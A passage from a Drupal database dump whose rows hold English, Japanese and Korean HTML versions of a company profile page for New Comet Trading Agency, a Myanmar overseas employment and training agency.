lang=\"JA\">我々ニューコメットトレーディング会社からは経験豊富で、能力の高い研修生達を生み出し、海外の仕事チャンスを与えることに重ねて努力をしてまいります。</span><o:p></o:p></p>', '', 'full_html'),
('page', 0, 23, 160, 'ko', 0, '<p class=\"text-align-justify MsoListParagraphCxSpLast\" style=\"margin-left:.75in;mso-add-space:auto;\">Coming soon<o:p></o:p></p>', '', 'full_html'),
('page', 0, 23, 165, 'en', 0, '<p><span style=\"font-size:14.0pt;line-height:107%;\">We, ``NEW COMET TRADING\'\' company, was established in 2004 and started operating with company registration number (295/2004-2005).</span><o:p></o:p></p><p><span style=\"font-size:14.0pt;line-height:107%;\">NEW COMET TRADING AGENCY Co.,Ltd (New Comet Overseas Employment Agency) licence was obtained in 2023 and since then, the company has started to carry out service activities.</span><o:p></o:p></p><p><span style=\"font-size:14.0pt;line-height:107%;\">&nbsp;We, ``NEW COMET TRADING AGENCY\'\' company, which is a brother company, such as, ZEYA NEW COMET Auto Sale &amp; Services Co.,Ltd, NEW COMET Co.,Ltd, have applied for vehicle import permits from the Ministry of Economy and Commerce, and have been working for more than 25 years in the business of buying, importing and selling various types of business trucks, tourism and transportation buses and machinery directly from Japan, and have paid the taxes set for the state. More than 100 employees were given employment opportunities.</span><o:p></o:p></p><p><span style=\"font-size:14.0pt;line-height:107%;\">In addition, brother companies such as NEW COMET Construction Co.,Ltd, NEW ZAYYA SHWE PYI Construction Co.,Ltd, AUNG NAY WUN Construction Co.,Ltd and other companies have also successfully won tenders from government ministries and have provided employment opportunities to more than 200 employees.</span></p><p><span style=\"font-size:14.0pt;line-height:107%;\">Our company \"NEW COMET TRADING AGENCY “company is currently providing welding training courses to become qualified skilled workers at the Sinmalike Shipyard for ethnic brothers from all over Myanmar who want to work in Korea\'s shipyards and connect them with job opportunities.&nbsp;</span></p><p><o:p></o:p><span style=\"font-size:14.0pt;line-height:107%;\">In addition, we are connecting job opportunities for young people who want to work in countries such as Dubai, Malaysia, Singapore, Thailand, and Japan.</span><o:p></o:p></p><p><span style=\"font-size:14.0pt;line-height:107%;\">We at NEW COMET TRADING AGENCY Co.Ltd, are assisting on responsible for learning about Japan\'s developed advanced technologies, cultures and expressing their personal abilities and goals for the young generation in Myanmar.&nbsp;</span></p><p><o:p></o:p><span style=\"font-size:14.0pt;line-height:107%;\">In order to successfully pass the qualification tests (JLPT, JFT, NAT-TEST, TOP-J) required to go to Japan with a Work Visa and Training Visa, we are opening language training schools and providing teaching support.</span><o:p></o:p></p><p><span style=\"font-size:14.0pt;line-height:107%;\">We, \"NEW COMET TRADING AGENCY\" company, is constantly striving to provide services that produce talented skilled workers from Myanmar and send them to foreign countries.</span></p>', '', 'full_html'),
('page', 0, 23, 165, 'ja', 0, '<p class=\"MsoNormal\"><span style=\"mso-bidi-font-size:10.5pt;\" lang=\"JA\">当社は</span><span style=\"mso-bidi-font-size:10.5pt;\">2004</span><span style=\"mso-bidi-font-size:10.5pt;\" lang=\"JA\">年に設立し、登録</span><span style=\"mso-bidi-font-size:10.5pt;\">ID(295/2004</span><span style=\"mso-bidi-font-size:10.5pt;\" lang=\"JA\">ー</span><span style=\"mso-bidi-font-size:10.5pt;\">2005)</span><span style=\"mso-bidi-font-size:10.5pt;\" lang=\"JA\">を持ち、サービスの提供を行ってきました。ニューコメットトレンディーグ海外エイジェンシー登録を</span><span style=\"mso-bidi-font-size:10.5pt;\">2023</span><span style=\"mso-bidi-font-size:10.5pt;\" lang=\"JA\">年にできまして、運営を始めました。</span><o:p></o:p></p><p class=\"MsoNormal\"><span style=\"mso-bidi-font-size:10.5pt;\" lang=\"JA\">ニューコメットトレーディング会社のグループ会社である</span><span style=\"mso-bidi-font-size:10.5pt;\">.</span><span style=\"mso-bidi-font-size:10.5pt;\" lang=\"JA\">ゼィーヤーニューコメットとしては自動車輸入許可をもらって現場用トラックや、旅行用と交通機関などに使用されるバスや色々な機械を日本から直接輸入をし、販売する事業を</span><span style=\"mso-bidi-font-size:10.5pt;\">25</span><span style=\"mso-bidi-font-size:10.5pt;\" lang=\"JA\">年間やり続けてきました。税金の納税もしっかり行なった上、</span><span style=\"mso-bidi-font-size:10.5pt;\">100</span><span style=\"mso-bidi-font-size:10.5pt;\" lang=\"JA\">人の従業員を持つ事ができました。</span><o:p></o:p></p><p class=\"MsoNormal\"><span style=\"mso-bidi-font-size:10.5pt;\" lang=\"JA\">それに、グループ会社であるニューコメットト建築会社、ゼィーヤシュェピーティー建築会社、アウンネーウィン建築会社でも政府からきょかおたくさん頂き、</span><span style=\"mso-bidi-font-size:10.5pt;\">200</span><span style=\"mso-bidi-font-size:10.5pt;\" lang=\"JA\">人程の従業員を持った会社として動いております。</span><o:p></o:p></p><p class=\"MsoNormal\"><span style=\"mso-bidi-font-size:10.5pt;\" lang=\"JA\">現在、ニューコメットトレンディグエイジェンシーでは韓国の造船所で働きたいミャンマー全国から民族問わず、商務部の下でシンマライ湾岸で経験豊富な先生達の元で練習を重ねた研修をしていただき、仕事紹介をしております。</span><o:p></o:p></p><p class=\"MsoNormal\"><span style=\"mso-bidi-font-size:10.5pt;\" lang=\"JA\">そして、ドバイ、マレーシア、シンガポール、タイ、日本にもお仕事紹介できる様に力を注いでおります。</span><o:p></o:p></p><p class=\"MsoNormal\"><span lang=\"JA\">ミャンマーの若者達には自分に合ったお仕事や自分らしさをたもちながら、日本の技術を勉強できるようにサポートをし続けたいと努力をしております。</span><o:p></o:p></p><p class=\"MsoNormal\"><span lang=\"JA\">日本語能力試験</span>(JLPT,<span style=\"mso-spacerun:yes;\">&nbsp; </span>JFT, NAT-TEST, TOP-J)<span lang=\"JA\">を合格した生徒はワークビザ、研修ビザなどて、いけるように提案をしております。</span><o:p></o:p></p><p class=\"MsoNormal\"><span lang=\"JA\">我々ニューコメットトレーディング会社からは経験豊富で、能力の高い研修生達を生み出し、海外の仕事チャンスを与えることに重ねて努力をしてまいります。</span><o:p></o:p></p>', '', 'full_html');
INSERT INTO `node_revision__body` (`bundle`, `deleted`, `entity_id`, `revision_id`, `langcode`, `delta`, `body_value`, `body_summary`, `body_format`) VALUES
('page', 0, 23, 165, 'ko', 0, '<p class=\"MsoNormal\"><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">저희</span><span style=\"mso-fareast-language:KO;\"> ``New Comet Trading\'\'&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">회사는</span><span style=\"mso-fareast-language:KO;\"> 2004</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">년에</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">설립되어</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">사업자등록번호</span><span style=\"mso-fareast-language:KO;\">(295/2004-2005)</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">로</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">영업을</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">시작하였습니다</span><span style=\"mso-fareast-language:KO;\">.</span><o:p></o:p></p><p class=\"MsoNormal\"><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">뉴코멧무역대행</span><span style=\"mso-fareast-language:KO;\"> 2023</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">년</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">뉴코멧</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">외국인고용업</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">면허를</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">취득하여</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">서비스</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">활동을</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">시작하였습니다</span><span style=\"mso-fareast-language:KO;\">.</span><o:p></o:p></p><p class=\"MsoNormal\"><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">저희 <strong>뉴코멧</strong></span><span style=\"mso-fareast-language:KO;\" lang=\"KO\"><strong>&nbsp;</strong></span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\"><strong>해외직업소개회사</strong>&nbsp;</span><span style=\"mso-fareast-language:KO;\">\"New Comet Overseas Employment Agency\"</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">는자매</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">회사인&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;mso-spacerun:yes;\" lang=\"KO\"> </span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\"><strong>제야뉴코멧 자동차 판매 및 서비스 회사</strong></span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\">, </span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\"><strong>뉴코멧회사</strong>등</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">기업들과</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">협력하여</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">경제통상자원부에서&nbsp;</span><span style=\"mso-fareast-language:KO;mso-spacerun:yes;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">차량</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">수입허가를</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">신청했고</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">각종</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">상용트럭</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\">, </span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">관광</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">산업 및</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">운송에</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">사용되는</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">다양한</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">유형의</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">버스</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">및</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">기계를</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">일본에서</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">직접</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">구매 판매하는</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">사업을</span><span style=\"mso-fareast-language:KO;\"> 25</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">년</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">이상&nbsp;</span><span style=\"mso-fareast-language:KO;mso-spacerun:yes;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">종사해</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">왔고 나라를 위한 정한 세금들을 냈습니다</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\">. </span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">게다가</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\">100 </span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">명 이상의</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">직원에게</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">고용</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">기회를</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">제공했습니다</span><span style=\"mso-fareast-language:KO;\">.</span><o:p></o:p></p><p class=\"MsoNormal\"><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">또한</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">쌍둥이</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">회사인</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\"><strong>뉴코멧건설 회사</strong></span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\"><strong>, </strong></span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\"><strong>제야슈웨삐띡 건설 회사</strong></span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\"><strong>, </strong></span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\"><strong>아웅네원 회사</strong>들은 정부</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">부처로부터</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">입찰&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\">(tender)</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">을</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">받고</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">건설</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">작업을</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">하는</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">동안</span><span style=\"mso-fareast-language:KO;\"> 200</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">명</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">이상의</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">직원에게</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">고용</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">기회를</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">제공했습니다</span><span style=\"mso-fareast-language:KO;\">.</span><o:p></o:p></p><p class=\"MsoNormal\"><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">저희</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\"> \"</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">뉴코멧 해외 직업 소개회사</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\">\"</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">는 한국 조선소로 취업을 희망하는 미얀마 각지에서 온 소수민족 형제들을 교통통신부 산하의 씬마락</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\"> (Sinmalike) </span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">조선소에서 유능한 트레이너들와 함께 실력있는 용접공이 되도록 수업을 제공하고 있으며 관련 기업체로 취업할 수 있게 도와주고 있습니다</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\">.</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">또한</span><span style=\"mso-fareast-language:KO;\">,&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">두바이</span><span style=\"mso-fareast-language:KO;\">,&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">말레이시아</span><span style=\"mso-fareast-language:KO;\">,&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">싱가포</span><span style=\"mso-fareast-language:KO;\">,&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">태국</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\">, </span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">일본 같은</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">국가에서</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">일하기를</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">원하는</span><span style=\"mso-fareast-language:KO;\" 